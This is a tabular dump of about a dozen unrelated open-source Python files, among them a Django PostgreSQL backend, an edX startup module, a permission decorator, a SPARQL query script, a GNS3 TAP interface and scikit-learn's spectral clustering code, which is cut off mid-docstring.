| code (string, 3–1.05M chars) | repo_name (string, 5–104 chars) | path (string, 4–251 chars) | language (1 class) | license (15 values) | size (int64, 3–1.05M) |
|---|---|---|---|---|---|
"""
PostgreSQL database backend for Django.
Requires psycopg 2: http://initd.org/projects/psycopg2
"""
import logging
import sys
from django.db.backends import *
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
from django.db.backends.postgresql_psycopg2.client import DatabaseClient
from django.db.backends.postgresql_psycopg2.creation import DatabaseCreation
from django.db.backends.postgresql_psycopg2.version import get_version
from django.db.backends.postgresql_psycopg2.introspection import DatabaseIntrospection
from django.utils.encoding import force_str
from django.utils.functional import cached_property
from django.utils.safestring import SafeText, SafeBytes
from django.utils.timezone import utc
try:
import psycopg2 as Database
import psycopg2.extensions
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading psycopg2 module: %s" % e)
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
psycopg2.extensions.register_adapter(SafeBytes, psycopg2.extensions.QuotedString)
psycopg2.extensions.register_adapter(SafeText, psycopg2.extensions.QuotedString)
logger = logging.getLogger('django.db.backends')
def utc_tzinfo_factory(offset):
if offset != 0:
raise AssertionError("database connection isn't set to UTC")
return utc
class DatabaseFeatures(BaseDatabaseFeatures):
needs_datetime_string_cast = False
can_return_id_from_insert = True
requires_rollback_on_dirty_transaction = True
has_real_datatype = True
can_defer_constraint_checks = True
has_select_for_update = True
has_select_for_update_nowait = True
has_bulk_insert = True
uses_savepoints = True
supports_tablespaces = True
supports_transactions = True
can_distinct_on_fields = True
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'postgresql'
operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': 'LIKE %s',
'icontains': 'LIKE UPPER(%s)',
'regex': '~ %s',
'iregex': '~* %s',
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': 'LIKE %s',
'endswith': 'LIKE %s',
'istartswith': 'LIKE UPPER(%s)',
'iendswith': 'LIKE UPPER(%s)',
}
Database = Database
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
opts = self.settings_dict["OPTIONS"]
RC = psycopg2.extensions.ISOLATION_LEVEL_READ_COMMITTED
self.isolation_level = opts.get('isolation_level', RC)
self.features = DatabaseFeatures(self)
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = BaseDatabaseValidation(self)
def get_connection_params(self):
settings_dict = self.settings_dict
if not settings_dict['NAME']:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured(
"settings.DATABASES is improperly configured. "
"Please supply the NAME value.")
conn_params = {
'database': settings_dict['NAME'],
}
conn_params.update(settings_dict['OPTIONS'])
if 'autocommit' in conn_params:
del conn_params['autocommit']
if 'isolation_level' in conn_params:
del conn_params['isolation_level']
if settings_dict['USER']:
conn_params['user'] = settings_dict['USER']
if settings_dict['PASSWORD']:
conn_params['password'] = force_str(settings_dict['PASSWORD'])
if settings_dict['HOST']:
conn_params['host'] = settings_dict['HOST']
if settings_dict['PORT']:
conn_params['port'] = settings_dict['PORT']
return conn_params
def get_new_connection(self, conn_params):
return Database.connect(**conn_params)
def init_connection_state(self):
settings_dict = self.settings_dict
self.connection.set_client_encoding('UTF8')
tz = 'UTC' if settings.USE_TZ else settings_dict.get('TIME_ZONE')
if tz:
try:
get_parameter_status = self.connection.get_parameter_status
except AttributeError:
# psycopg2 < 2.0.12 doesn't have get_parameter_status
conn_tz = None
else:
conn_tz = get_parameter_status('TimeZone')
if conn_tz != tz:
self.connection.cursor().execute(
self.ops.set_time_zone_sql(), [tz])
# Commit after setting the time zone (see #17062)
self.connection.commit()
self.connection.set_isolation_level(self.isolation_level)
def create_cursor(self):
cursor = self.connection.cursor()
cursor.tzinfo_factory = utc_tzinfo_factory if settings.USE_TZ else None
return cursor
def close(self):
self.validate_thread_sharing()
if self.connection is None:
return
try:
self.connection.close()
self.connection = None
except Database.Error:
# In some cases (database restart, network connection lost etc...)
# the connection to the database is lost without giving Django a
# notification. If we don't set self.connection to None, the error
# will occur at every request.
self.connection = None
logger.warning('psycopg2 error while closing the connection.',
exc_info=sys.exc_info()
)
raise
finally:
self.set_clean()
def _set_isolation_level(self, isolation_level):
assert isolation_level in range(1, 5) # Use set_autocommit for level = 0
if self.psycopg2_version >= (2, 4, 2):
self.connection.set_session(isolation_level=isolation_level)
else:
self.connection.set_isolation_level(isolation_level)
def _set_autocommit(self, autocommit):
if self.psycopg2_version >= (2, 4, 2):
self.connection.autocommit = autocommit
else:
if autocommit:
level = psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT
else:
level = self.isolation_level
self.connection.set_isolation_level(level)
def check_constraints(self, table_names=None):
"""
To check constraints, we set them to immediate. Then, when we're done,
we must ensure they are returned to deferred.
"""
self.cursor().execute('SET CONSTRAINTS ALL IMMEDIATE')
self.cursor().execute('SET CONSTRAINTS ALL DEFERRED')
def is_usable(self):
try:
# Use a psycopg cursor directly, bypassing Django's utilities.
self.connection.cursor().execute("SELECT 1")
except DatabaseError:
return False
else:
return True
@cached_property
def psycopg2_version(self):
version = psycopg2.__version__.split(' ', 1)[0]
return tuple(int(v) for v in version.split('.'))
@cached_property
def pg_version(self):
with self.temporary_connection():
return get_version(self.connection)
| zzeleznick/zDjango | venv/lib/python2.7/site-packages/django/db/backends/postgresql_psycopg2/base.py | Python | mit | 7,566 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-20 01:51
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cs_questions', '0007_quizlist'),
]
operations = [
migrations.DeleteModel(
name='QuizResponse',
),
]
| wilkerwma/codeschool | src/cs_questions/migrations/0008_delete_quizresponse.py | Python | gpl-3.0 | 360 |
"""
Module for code that should run during LMS startup
"""
# pylint: disable=unused-argument
from django.conf import settings
# Force settings to run so that the python path is modified
settings.INSTALLED_APPS # pylint: disable=pointless-statement
from openedx.core.lib.django_startup import autostartup
import edxmako
import logging
from monkey_patch import django_utils_translation
import analytics
log = logging.getLogger(__name__)
def run():
"""
Executed during django startup
"""
# Patch the xml libs.
from safe_lxml import defuse_xml_libs
defuse_xml_libs()
django_utils_translation.patch()
autostartup()
add_mimetypes()
if settings.FEATURES.get('USE_CUSTOM_THEME', False):
enable_theme()
if settings.FEATURES.get('USE_MICROSITES', False):
enable_microsites()
if settings.FEATURES.get('ENABLE_THIRD_PARTY_AUTH', False):
enable_third_party_auth()
# Initialize Segment.io analytics module. Flushes first time a message is received and
# every 50 messages thereafter, or if 10 seconds have passed since last flush
if settings.FEATURES.get('SEGMENT_IO_LMS') and hasattr(settings, 'SEGMENT_IO_LMS_KEY'):
analytics.init(settings.SEGMENT_IO_LMS_KEY, flush_at=50)
def add_mimetypes():
"""
Add extra mimetypes. Used in xblock_resource.
If you add a mimetype here, be sure to also add it in cms/startup.py.
"""
import mimetypes
mimetypes.add_type('application/vnd.ms-fontobject', '.eot')
mimetypes.add_type('application/x-font-opentype', '.otf')
mimetypes.add_type('application/x-font-ttf', '.ttf')
mimetypes.add_type('application/font-woff', '.woff')
def enable_theme():
"""
Enable the settings for a custom theme, whose files should be stored
in ENV_ROOT/themes/THEME_NAME (e.g., edx_all/themes/stanford).
"""
# Workaround for setting THEME_NAME to an empty
# string which is the default due to this ansible
# bug: https://github.com/ansible/ansible/issues/4812
if settings.THEME_NAME == "":
settings.THEME_NAME = None
return
assert settings.FEATURES['USE_CUSTOM_THEME']
settings.FAVICON_PATH = 'themes/{name}/images/favicon.ico'.format(
name=settings.THEME_NAME
)
# Calculate the location of the theme's files
theme_root = settings.ENV_ROOT / "themes" / settings.THEME_NAME
# Include the theme's templates in the template search paths
settings.TEMPLATE_DIRS.insert(0, theme_root / 'templates')
edxmako.paths.add_lookup('main', theme_root / 'templates', prepend=True)
# Namespace the theme's static files to 'themes/<theme_name>' to
# avoid collisions with default edX static files
settings.STATICFILES_DIRS.append(
(u'themes/{}'.format(settings.THEME_NAME), theme_root / 'static')
)
# Include theme locale path for django translations lookup
settings.LOCALE_PATHS = (theme_root / 'conf/locale',) + settings.LOCALE_PATHS
def enable_microsites():
"""
Enable the use of microsites, which are websites that allow
for subdomains for the edX platform, e.g. foo.edx.org
"""
microsites_root = settings.MICROSITE_ROOT_DIR
microsite_config_dict = settings.MICROSITE_CONFIGURATION
for ms_name, ms_config in microsite_config_dict.items():
# Calculate the location of the microsite's files
ms_root = microsites_root / ms_name
# pull in configuration information from each
# microsite root
if ms_root.isdir():
# store the path on disk for later use
ms_config['microsite_root'] = ms_root
template_dir = ms_root / 'templates'
ms_config['template_dir'] = template_dir
ms_config['microsite_name'] = ms_name
log.info('Loading microsite {0}'.format(ms_root))
else:
# not sure if we have application logging at this stage of
# startup
log.error('Error loading microsite {0}. Directory does not exist'.format(ms_root))
# remove from our configuration as it is not valid
del microsite_config_dict[ms_name]
# if we have any valid microsites defined, let's wire in the Mako and STATIC_FILES search paths
if microsite_config_dict:
settings.TEMPLATE_DIRS.append(microsites_root)
edxmako.paths.add_lookup('main', microsites_root)
settings.STATICFILES_DIRS.insert(0, microsites_root)
def enable_third_party_auth():
"""
Enable the use of third_party_auth, which allows users to sign in to edX
using other identity providers. For configuration details, see
common/djangoapps/third_party_auth/settings.py.
"""
from third_party_auth import settings as auth_settings
auth_settings.apply_settings(settings)
| htzy/bigfour | lms/startup.py | Python | agpl-3.0 | 4,878 |
from leapp.utils.meta import with_metaclass
class PhaseMeta(type):
classes = []
def __new__(mcs, name, bases, attrs):
klass = super(PhaseMeta, mcs).__new__(mcs, name, bases, attrs)
PhaseMeta.classes.append(klass)
return klass
class Phase(with_metaclass(PhaseMeta)):
@classmethod
def get_index(cls):
return PhaseMeta.classes.index(cls)
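# Usage sketch (added for illustration; the phase names below are assumptions,
# not part of the original module). Defining subclasses registers them with
# PhaseMeta in declaration order, so get_index() gives a phase's position:
#
#   class ScanPhase(Phase):
#       pass
#
#   class ApplyPhase(Phase):
#       pass
#
#   assert ScanPhase.get_index() < ApplyPhase.get_index()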
| vinzenz/prototype | leapp/workflows/phases.py | Python | apache-2.0 | 388 |
# -*- coding: utf-8 -*-
from __future__ import print_function
import os, sys, math, MySQLdb, click, time
import pandas as pd
from scripts.rais._to_df import to_df
from numpy import argsort
'''
Usage:
python gini.py -y 2013 -o data/rais/ -a bra -t rais_yb
'''
''' Connect to DB '''
db = MySQLdb.connect(host=os.environ["DATAVIVA_DB_HOST"], user=os.environ["DATAVIVA_DB_USER"],
passwd=os.environ["DATAVIVA_DB_PW"],
db=os.environ["DATAVIVA_DB_NAME"])
db.autocommit(1)
cursor = db.cursor()
depths_lookup = {
"bra": [1, 3, 5, 7, 9],
"cbo": [1, 4],
"cnae": [1, 3, 6]
}
table_lookup = {
"bra": "rais_yb",
"cbo": "rais_yo",
"cnae": "rais_yi"
}
def gini_coeff(x):
n = len(x)
s = x.sum()
r = argsort(argsort(-x)) # calculates zero-based ranks
return 1 - (2.0 * (r*x).sum() + s)/(n*s)
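# Worked example (added for illustration, not part of the original script):
# a perfectly equal distribution yields 0; full concentration approaches 1.
#
#   >>> gini_coeff(pd.Series([1.0, 1.0, 1.0, 1.0]))
#   0.0
#   >>> gini_coeff(pd.Series([0.0, 0.0, 0.0, 100.0]))
#   0.75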
@click.command()
@click.option('-y', '--year', prompt='Year', help='year of the data to convert', required=True)
@click.option('output_path', '--output', '-o', help='Path to save files to.', type=click.Path(), required=True, prompt="Output path")
@click.option('--attr_type', '-a', type=click.Choice(['bra','cbo','cnae']), required=True, prompt="Attr Type")
def main(year, output_path, attr_type):
if "-" in year:
years = range(int(year.split('-')[0]), int(year.split('-')[1])+1)
else:
years = [int(year)]
print("years:", str(years))
for year in years:
start = time.time()
d = pd.HDFStore(os.path.join(output_path, str(year), 'rais_df_raw.h5'))
if "rais_df" in d:
rais_df = d['rais_df']
else:
file_path = os.path.join(output_path,'Rais_{}.csv.bz2'.format(year))
rais_df = to_df(file_path)
d['rais_df'] = rais_df
for depth in depths_lookup[attr_type]:
print("\n{} depth: {}\n".format(attr_type, depth))
this_depth_df = rais_df.copy()
this_depth_df['{}_id'.format(attr_type)] = this_depth_df['{}_id'.format(attr_type)].str.slice(0, depth)
uniqs = this_depth_df["{}_id".format(attr_type)].unique()[::-1]
for i, id in enumerate(uniqs):
this_id_df = this_depth_df[this_depth_df['{}_id'.format(attr_type)] == id]
if len(this_id_df.index) < 10:
print("\nNot enough occurences for histogram thus no GINI (need at least 10)")
continue
print("********* {}: {} ({}/{}) *********".format(year, id, i+1, len(uniqs)), end='\r')
sys.stdout.flush()
wage = this_id_df["wage"]
gini = gini_coeff(wage)
# print(gini)
table = table_lookup[attr_type]
cursor.execute("update {} set gini=%s where year=%s and {}_id=%s".format(table, attr_type), (gini, year, id))
# raw_input('')
d.close()
print("\n\n--- %s minutes ---\n\n" % str((time.time() - start)/60))
if __name__ == "__main__":
main()
| DataViva/dataviva-scripts | scripts/rais/gini.py | Python | mit | 3,050 |
import time
import hark.exceptions
import hark.guest
import hark.log
from hark.lib.command import which, Command
class BaseDriver(object):
def __init__(self, machine):
self.machine = machine
self.guest_config = hark.guest.guest_config(machine['guest'])
@classmethod
def commandPath(cls):
# subclass is expected to set cmd
return which(cls.cmd)
@classmethod
def isAvailable(cls):
return cls.commandPath() is not None
@classmethod
def version(cls):
cmd = Command(cls.cmd, cls.versionArg)
res = cmd.assertRun()
return res.stdout.strip()
def assertStatus(self, msg, *valid_statuses):
"""
Given a machine driver instance, throw hark.exceptions.InvalidStatus
unless the status of the machine is in the specified set.
msg is a message which will be used to format the exception.
"""
s = self.status()
if s not in valid_statuses:
fmt = ', '.join(["'%s'" % str(st) for st in valid_statuses])
raise hark.exceptions.InvalidStatus(
"%s: status is '%s' and needs to be one of (%s)" % (msg, s, fmt))
def waitStatus(self, status, interval_ms=1000):
hark.log.info('Waiting for machine %s status to be %s' % (
self.machine['name'], status))
while True:
if self.status() == status:
return
time.sleep(interval_ms / 1000)
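# Minimal subclass sketch (added for illustration; the command name and
# version flag are assumptions, not from the original module):
#
#   class VBoxDriver(BaseDriver):
#       cmd = 'VBoxManage'
#       versionArg = '--version'
#
#   if VBoxDriver.isAvailable():
#       print(VBoxDriver.version())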
| ceralena/hark | src/hark/driver/base.py | Python | gpl-3.0 | 1,509 |
import pytest
import numpy as np
import dask.array as da
from dask.array.numpy_compat import _make_sliced_dtype
from dask.array.utils import assert_eq
@pytest.fixture(params=[
[('A', ('f4', (3, 2))), ('B', ('f4', 3)), ('C', ('f8', 3))],
[('A', ('i4', (3, 2))), ('B', ('f4', 3)), ('C', ('S4', 3))],
])
def dtype(request):
return np.dtype(request.param)
@pytest.fixture(params=[
['A'],
['A', 'B'],
['A', 'B', 'C'],
])
def index(request):
return request.param
def test_basic():
# sanity check
dtype = [('a', 'f8'), ('b', 'f8'), ('c', 'f8')]
x = np.ones((5, 3), dtype=dtype)
dx = da.ones((5, 3), dtype=dtype, chunks=3)
result = dx[['a', 'b']]
expected = x[['a', 'b']]
assert_eq(result, expected)
def test_slice_dtype(dtype, index):
result = _make_sliced_dtype(dtype, index)
expected = np.ones((5, len(dtype)), dtype=dtype)[index].dtype
assert result == expected
| kenshay/ImageScript | ProgramData/SystemFiles/Python/Lib/site-packages/dask/array/tests/test_numpy_compat.py | Python | gpl-3.0 | 935 |
# coding=utf-8
"""
permission_required decorator for generic classbased/functionbased view
"""
__author__ = 'mark'
from functools import wraps
from django.http import HttpRequest
from django.utils.decorators import available_attrs
from django.core.exceptions import PermissionDenied
from permission.decorators.utils import redirect_to_login
def permission_required(perm, queryset=None,
login_url=None, raise_exception=False):
"""
Permission check decorator for class-based/function-based generic views.
This decorator works as both a method and a function decorator.
Do NOT wrap it with ``method_decorator`` or similar helpers, because this
decorator relies on the ``self`` argument of class-based generic view methods.
Parameters
----------
perm : string
A permission string
queryset : queryset or model
A queryset or model for finding object.
With classbased generic view, ``None`` for using view default queryset.
When the view does not define ``get_queryset``, ``queryset``,
``get_object``, or ``object`` then ``obj=None`` is used to check
permission.
With functional generic view, ``None`` for using passed queryset.
When non queryset was passed then ``obj=None`` is used to check
permission.
Examples
--------
>>> # As method decorator
>>> class UpdateAuthUserView(UpdateView):
>>> @permission_required('auth.change_user')
>>> def dispatch(self, request, *args, **kwargs):
... pass
>>> # As function decorator
>>> @permission_required('auth.change_user')
>>> def update_auth_user(request, *args, **kwargs):
... pass
"""
def wrapper(view_method):
@wraps(view_method, assigned=available_attrs(view_method))
def inner(self, request=None, *args, **kwargs):
if isinstance(self, HttpRequest):
from permission.decorators.functionbase import \
permission_required as decorator
# this is a functional view not classbased view.
decorator = decorator(perm, queryset,
login_url, raise_exception)
decorator = decorator(view_method)
if request:
args = list(args)
args.insert(0, request)
request = self
return decorator(request, *args, **kwargs)
else:
from permission.decorators.classbase import \
get_object_from_classbased_instance
# get object
obj = get_object_from_classbased_instance(
self, queryset, request, *args, **kwargs
)
if not request.user.has_perm(perm, obj=obj):
if raise_exception:
raise PermissionDenied
else:
return redirect_to_login(request, login_url)
return view_method(self, request, *args, **kwargs)
return inner
return wrapper
| somcomltd/django-rbac | rbac/decorators/methodbase.py | Python | mit | 3,130 |
# filename: ex363.py
# Query Linked Movie database endpoint about common actors of
# two directors and output HTML page with links to Freebase.
from SPARQLWrapper import SPARQLWrapper, JSON
director1 = "Steven Spielberg"
director2 = "Stanley Kubrick"
sparql = SPARQLWrapper("http://data.linkedmdb.org/sparql")
queryString = """
PREFIX m: <http://data.linkedmdb.org/resource/movie/>
PREFIX foaf: <http://xmlns.com/foaf/0.1/>
SELECT DISTINCT ?actorName ?freebaseURI WHERE {
?dir1 m:director_name "DIR1-NAME" .
?dir2 m:director_name "DIR2-NAME" .
?dir1film m:director ?dir1 ;
m:actor ?actor .
?dir2film m:director ?dir2 ;
m:actor ?actor .
?actor m:actor_name ?actorName ;
foaf:page ?freebaseURI .
}
"""
queryString = queryString.replace("DIR1-NAME",director1)
queryString = queryString.replace("DIR2-NAME",director2)
sparql.setQuery(queryString)
sparql.setReturnFormat(JSON)
results = sparql.query().convert()
print """
<html><head><title>results</title>
<style type="text/css"> * { font-family: arial,helvetica}</style>
</head><body>
"""
print "<h1>Actors directed by both " + director1 + " and " + director2 + "</h1>"
if (len(results["results"]["bindings"]) == 0):
print "<p>No results found.</p>"
else:
for result in results["results"]["bindings"]:
actorName = result["actorName"]["value"]
freebaseURI = result["freebaseURI"]["value"]
print "<p><a href=\"" + freebaseURI + "\">" + actorName + "</p>"
print "</body></html>"
| agazzarini/SolRDF | solrdf/solrdf-integration-tests/src/test/resources/LearningSPARQLExamples/ex363.py | Python | apache-2.0 | 1,592 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 GNS3 Technologies Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Interface for TAP NIOs (UNIX based OSes only).
"""
import asyncio
import uuid
from .nio import NIO
import logging
log = logging.getLogger(__name__)
class NIOTAP(NIO):
"""
Dynamips TAP NIO.
:param hypervisor: Dynamips hypervisor instance
:param tap_device: TAP device name (e.g. tap0)
"""
def __init__(self, hypervisor, tap_device):
# create a unique name
name = 'tap-{}'.format(uuid.uuid4())
self._tap_device = tap_device
super().__init__(name, hypervisor)
@asyncio.coroutine
def create(self):
yield from self._hypervisor.send("nio create_tap {name} {tap}".format(name=self._name, tap=self._tap_device))
log.info("NIO TAP {name} created with device {device}".format(name=self._name, device=self._tap_device))
@property
def tap_device(self):
"""
Returns the TAP device used by this NIO.
:returns: the TAP device name
"""
return self._tap_device
def __json__(self):
return {"type": "nio_tap",
"tap_device": self._tap_device}
| harrijs/gns3-server | gns3server/modules/dynamips/nios/nio_tap.py | Python | gpl-3.0 | 1,806 |
"""Algorithms for spectral clustering"""
# Author: Gael Varoquaux gael.varoquaux@normalesup.org
# Brian Cheung
# Wei LI <kuantkid@gmail.com>
# License: BSD
import warnings
import numpy as np
from ..base import BaseEstimator, ClusterMixin
from ..utils import check_random_state, as_float_array
from ..utils.extmath import norm
from ..metrics.pairwise import rbf_kernel
from ..neighbors import kneighbors_graph
from ..manifold import spectral_embedding
from .k_means_ import k_means
def discretize(vectors, copy=True, max_svd_restarts=30, n_iter_max=20,
random_state=None):
"""Search for a partition matrix (clustering) which is closest to the
eigenvector embedding.
Parameters
----------
vectors : array-like, shape: (n_samples, n_clusters)
The embedding space of the samples.
copy : boolean, optional, default: True
Whether to copy vectors, or perform in-place normalization.
max_svd_restarts : int, optional, default: 30
Maximum number of attempts to restart SVD if convergence fails
n_iter_max : int, optional, default: 20
Maximum number of iterations to attempt in rotation and partition
matrix search if machine precision convergence is not reached
random_state: int seed, RandomState instance, or None (default)
A pseudo random number generator used for the initialization of the
rotation matrix
Returns
-------
labels : array of integers, shape: n_samples
The labels of the clusters.
References
----------
- Multiclass spectral clustering, 2003
Stella X. Yu, Jianbo Shi
http://www1.icsi.berkeley.edu/~stellayu/publication/doc/2003kwayICCV.pdf
Notes
-----
The eigenvector embedding is used to iteratively search for the
closest discrete partition. First, the eigenvector embedding is
normalized to the space of partition matrices. An optimal discrete
partition matrix closest to this normalized embedding multiplied by
an initial rotation is calculated. Fixing this discrete partition
matrix, an optimal rotation matrix is calculated. These two
calculations are performed until convergence. The discrete partition
matrix is returned as the clustering solution. Used in spectral
clustering, this method tends to be faster and more robust to random
initialization than k-means.
"""
from scipy.sparse import csc_matrix
from scipy.linalg import LinAlgError
random_state = check_random_state(random_state)
vectors = as_float_array(vectors, copy=copy)
eps = np.finfo(float).eps
n_samples, n_components = vectors.shape
# Normalize the eigenvectors to an equal length of a vector of ones.
# Reorient the eigenvectors to point in the negative direction with respect
# to the first element. This may have to do with constraining the
# eigenvectors to lie in a specific quadrant to make the discretization
# search easier.
norm_ones = np.sqrt(n_samples)
for i in range(vectors.shape[1]):
vectors[:, i] = (vectors[:, i] / norm(vectors[:, i])) \
* norm_ones
if vectors[0, i] != 0:
vectors[:, i] = -1 * vectors[:, i] * np.sign(vectors[0, i])
# Normalize the rows of the eigenvectors. Samples should lie on the unit
# hypersphere centered at the origin. This transforms the samples in the
# embedding space to the space of partition matrices.
vectors = vectors / np.sqrt((vectors ** 2).sum(axis=1))[:, np.newaxis]
svd_restarts = 0
has_converged = False
# If there is an exception we try to randomize and rerun SVD again
# do this max_svd_restarts times.
while (svd_restarts < max_svd_restarts) and not has_converged:
# Initialize first column of rotation matrix with a row of the
# eigenvectors
rotation = np.zeros((n_components, n_components))
rotation[:, 0] = vectors[random_state.randint(n_samples), :].T
# To initialize the rest of the rotation matrix, find the rows
# of the eigenvectors that are as orthogonal to each other as
# possible
c = np.zeros(n_samples)
for j in range(1, n_components):
# Accumulate c to ensure row is as orthogonal as possible to
# previous picks as well as current one
c += np.abs(np.dot(vectors, rotation[:, j - 1]))
rotation[:, j] = vectors[c.argmin(), :].T
last_objective_value = 0.0
n_iter = 0
while not has_converged:
n_iter += 1
t_discrete = np.dot(vectors, rotation)
labels = t_discrete.argmax(axis=1)
vectors_discrete = csc_matrix(
(np.ones(len(labels)), (np.arange(0, n_samples), labels)),
shape=(n_samples, n_components))
t_svd = vectors_discrete.T * vectors
try:
U, S, Vh = np.linalg.svd(t_svd)
except LinAlgError:
svd_restarts += 1
print("SVD did not converge, randomizing and trying again")
break
ncut_value = 2.0 * (n_samples - S.sum())
if ((abs(ncut_value - last_objective_value) < eps) or
(n_iter > n_iter_max)):
has_converged = True
else:
# otherwise calculate rotation and continue
last_objective_value = ncut_value
rotation = np.dot(Vh.T, U.T)
if not has_converged:
raise LinAlgError('SVD did not converge')
return labels
def spectral_clustering(affinity, n_clusters=8, n_components=None,
eigen_solver=None, random_state=None, n_init=10,
k=None, eigen_tol=0.0,
assign_labels='kmeans',
mode=None):
"""Apply clustering to a projection to the normalized laplacian.
In practice Spectral Clustering is very useful when the structure of
the individual clusters is highly non-convex or more generally when
a measure of the center and spread of the cluster is not a suitable
description of the complete cluster. For instance when clusters are
nested circles on the 2D plane.
If affinity is the adjacency matrix of a graph, this method can be
used to find normalized graph cuts.
Parameters
-----------
affinity: array-like or sparse matrix, shape: (n_samples, n_samples)
The affinity matrix describing the relationship of the samples to
embed. **Must be symmetric**.
Possible examples:
- adjacency matrix of a graph,
- heat kernel of the pairwise distance matrix of the samples,
- symmetric k-nearest neighbours connectivity matrix of the samples.
n_clusters: integer, optional
Number of clusters to extract.
n_components: integer, optional, default is n_clusters
Number of eigen vectors to use for the spectral embedding
eigen_solver: {None, 'arpack' or 'amg'}
The eigenvalue decomposition strategy to use. AMG requires pyamg
to be installed. It can be faster on very large, sparse problems,
but may also lead to instabilities
random_state: int seed, RandomState instance, or None (default)
A pseudo random number generator used for the initialization
of the lobpcg eigen vectors decomposition when eigen_solver == 'amg'
and by the K-Means initialization.
n_init: int, optional, default: 10
Number of time the k-means algorithm will be run with different
centroid seeds. The final results will be the best output of
n_init consecutive runs in terms of inertia.
eigen_tol : float, optional, default: 0.0
Stopping criterion for eigendecomposition of the Laplacian matrix
when using arpack eigen_solver.
assign_labels : {'kmeans', 'discretize'}, default: 'kmeans'
The strategy to use to assign labels in the embedding
space. There are two ways to assign labels after the laplacian
embedding. k-means can be applied and is a popular choice. But it can
also be sensitive to initialization. Discretization is another
approach which is less sensitive to random initialization.
Returns
-------
labels: array of integers, shape: n_samples
The labels of the clusters.
References
----------
- Normalized cuts and image segmentation, 2000
Jianbo Shi, Jitendra Malik
http://citeseer.ist.psu.edu/viewdoc/summary?doi=10.1.1.160.2324
- A Tutorial on Spectral Clustering, 2007
Ulrike von Luxburg
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.165.9323
- Multiclass spectral clustering, 2003
Stella X. Yu, Jianbo Shi
http://www1.icsi.berkeley.edu/~stellayu/publication/doc/2003kwayICCV.pdf
Notes
------
The graph should contain only one connected component; otherwise
the results make little sense.
This algorithm solves the normalized cut for k=2: it is a
normalized spectral clustering.
"""
if assign_labels not in ('kmeans', 'discretize'):
raise ValueError("The 'assign_labels' parameter should be "
"'kmeans' or 'discretize', but '%s' was given"
% assign_labels)
if k is not None:
warnings.warn("'k' was renamed to n_clusters and will "
"be removed in 0.15.",
DeprecationWarning)
n_clusters = k
if mode is not None:
warnings.warn("'mode' was renamed to eigen_solver "
"and will be removed in 0.15.",
DeprecationWarning)
eigen_solver = mode
random_state = check_random_state(random_state)
n_components = n_clusters if n_components is None else n_components
maps = spectral_embedding(affinity, n_components=n_components,
eigen_solver=eigen_solver,
random_state=random_state,
eigen_tol=eigen_tol, drop_first=False)
if assign_labels == 'kmeans':
_, labels, _ = k_means(maps, n_clusters, random_state=random_state,
n_init=n_init)
else:
labels = discretize(maps, random_state=random_state)
return labels
class SpectralClustering(BaseEstimator, ClusterMixin):
"""Apply clustering to a projection to the normalized laplacian.
In practice Spectral Clustering is very useful when the structure of
the individual clusters is highly non-convex or more generally when
a measure of the center and spread of the cluster is not a suitable
description of the complete cluster. For instance when clusters are
nested circles on the 2D plane.
If affinity is the adjacency matrix of a graph, this method can be
used to find normalized graph cuts.
When calling ``fit``, an affinity matrix is constructed using either the
Gaussian (aka RBF) kernel of the euclidean distance ``d(X, X)``::
np.exp(-gamma * d(X,X) ** 2)
or a k-nearest neighbors connectivity matrix.
Alternatively, using ``precomputed``, a user-provided affinity
matrix can be used.
Parameters
-----------
n_clusters : integer, optional
The dimension of the projection subspace.
affinity: string, 'nearest_neighbors', 'rbf' or 'precomputed'
gamma: float
Scaling factor of Gaussian (rbf) affinity kernel. Ignored for
``affinity='nearest_neighbors'``.
n_neighbors: integer
Number of neighbors to use when constructing the affinity matrix using
the nearest neighbors method. Ignored for ``affinity='rbf'``.
eigen_solver: {None, 'arpack' or 'amg'}
The eigenvalue decomposition strategy to use. AMG requires pyamg
to be installed. It can be faster on very large, sparse problems,
but may also lead to instabilities
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used for the initialization
of the lobpcg eigen vectors decomposition when eigen_solver == 'amg'
and by the K-Means initialization.
n_init : int, optional, default: 10
Number of time the k-means algorithm will be run with different
centroid seeds. The final results will be the best output of
n_init consecutive runs in terms of inertia.
eigen_tol : float, optional, default: 0.0
Stopping criterion for eigendecomposition of the Laplacian matrix
when using arpack eigen_solver.
assign_labels : {'kmeans', 'discretize'}, default: 'kmeans'
The strategy to use to assign labels in the embedding
space. There are two ways to assign labels after the laplacian
embedding. k-means can be applied and is a popular choice. But it can
also be sensitive to initialization. Discretization is another approach
which is less sensitive to random initialization.
Attributes
----------
`affinity_matrix_` : array-like, shape (n_samples, n_samples)
Affinity matrix used for clustering. Available only after calling
``fit``.
`labels_` :
Labels of each point
Notes
-----
If you have an affinity matrix, such as a distance matrix,
for which 0 means identical elements, and high values means
very dissimilar elements, it can be transformed in a
similarity matrix that is well suited for the algorithm by
applying the Gaussian (RBF, heat) kernel::
np.exp(- X ** 2 / (2. * delta ** 2))
Another alternative is to take a symmetric version of the k
nearest neighbors connectivity matrix of the points.
If the pyamg package is installed, it is used: this greatly
speeds up computation.
References
----------
- Normalized cuts and image segmentation, 2000
Jianbo Shi, Jitendra Malik
